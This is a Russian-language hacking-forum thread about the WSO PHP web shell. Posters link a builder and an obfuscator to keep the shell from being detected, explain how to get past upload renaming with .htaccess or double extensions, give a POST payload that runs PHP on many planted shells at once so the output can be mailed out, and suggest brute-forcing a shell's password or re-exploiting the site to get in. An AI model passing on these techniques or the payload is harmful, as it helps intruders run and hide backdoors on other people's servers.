WSO (веб-шелл)

Discussion in 'Избранное' started by oRb, 26 Jan 2009.

  1. Patl

    Patl New Member

    Joined:
    19 Apr 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Приветствую Всех.
    Респект автору за данное чудо:)
    Киньте ктонить ссыль на последнию версию, пожалуйста, и подскажите еще один момент, чем его лучше криптануть, чтоб не палился?
     
  2. terios

    terios Member

    Joined:
    3 Jan 2016
    Messages:
    11
    Likes Received:
    6
    Reputations:
    0
    http://kronus.me/cn/wso-builder/1.04/
    http://krober.biz/misc/obfuscator.php
     
    xoce and Patl like this.
  3. Grenaro

    Grenaro New Member

    Joined:
    13 Aug 2016
    Messages:
    5
    Likes Received:
    2
    Reputations:
    12
    Тоже с этим сталкивался. Единственное что придумал - редактировать файл локально, а потом заливать через загрузку файлов. А еще бывает что файл отредактировался нормально, но wso не может его отобразить почему-то и обрезает при выводе.
     
    Раrаdох likes this.
  4. obel

    obel New Member

    Joined:
    2 Feb 2016
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    после загрузки на сайт сменилось имя и расширение на "xql_-2.x-php" и соответсвенно при переходе на wso вместо исполнения php на страничке отображается код шелла. это можно как то обойти?
     
  5. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    1) загрузить .htaccess
    2) если не прокатит, то заюзать расширения xlsx, docx, 7z (как пример 1..php..7z)
    3) инклудить
     
    _________________________
  6. hiderat

    hiderat New Member

    Joined:
    9 Oct 2016
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
  7. hpol

    hpol Elder - Старейшина

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    16
    Reputations:
    15
    а возможно ли как то через wso создать базу данных? CREATE DATABASE test , выдаёт Error: Access denied for user
     
  8. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    а wso тут не при чём, у mysql пользователя должны быть привилегии на создание базы
     
    _________________________
  9. Aristokrat007

    Aristokrat007 New Member

    Joined:
    10 May 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Автор спасибо!
     
  10. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Всем привет!
    Коллеги, подскажите - у WSO есть API режим?
    зная урл и доступ, нужно запускать удалённо php скрипт - это возможно?
     
  11. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    То что вам нужно, называется бегдор, все просто делается! и API тут не причем!
     
    _________________________
  12. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Спасибо за разъяснение, буду знать.
    Можно чуть подробнее объяснить как на конкретной задаче этот бегдор использовать?

    Например, есть у меня 100 адресов WSO
    Хочу запустить там допустим phpinfo(); и результат кинуть на мыло.
    Скрипт запуска и отправки есть - как его "скормить" для удалённого выполнение WSO ?
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    пост запросом как вариант отправляем:
    a=Php&c=&p1=phpinfo%28%29%3B&p2=&p3=&charset=Windows-1251&pass=root
    а там парсем результат и отправляем куда надо
     
    _________________________
    GTAlex likes this.
  14. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    собственно, вопрос как раз был о том, чтобы не парсить :)
    думал, может есть более удобный инструмент для удалённого запуска PHP скриптов
     
  15. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Впринцепи я вам четко ответил по вашему вопросу, а дальше думайте сами как хотите....
     
    _________________________
  16. GTAlex

    GTAlex New Member

    Joined:
    7 Sep 2009
    Messages:
    48
    Likes Received:
    0
    Reputations:
    0
    Да, спасибо - регулярка элементарная.
    Именно этот вариант сейчас в работе.
     
    #516 GTAlex, 20 Dec 2016
    Last edited: 20 Dec 2016
  17. demok

    demok New Member

    Joined:
    6 Dec 2016
    Messages:
    5
    Likes Received:
    1
    Reputations:
    0
    подскажите пожалуйста
    есть адрес ВСО, очень надо войти а паса нету, есть ли возможность как то узнать пас или войти без него?
     
  18. PEPSICOLA

    PEPSICOLA . . . . . 2L . . . . .

    Joined:
    14 Oct 2004
    Messages:
    1,025
    Likes Received:
    823
    Reputations:
    368
    Узнать пас не получится, попробуй побрутить доступ к шелу по стандартным словарям, либо проверь сайт на известные уязвимости. Если шел до сих пор там, значит и уязвимости актуальны.
     
  19. artur1111

    artur1111 New Member

    Joined:
    3 Jun 2015
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    Скажите а что делает функция infect в wso? Ясно что она заражает сервер, но что именно?
     
  20. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    В чистом WSO нет такого. Функция может делать что угодно, но точно ничего путного. Возможно ифреймер.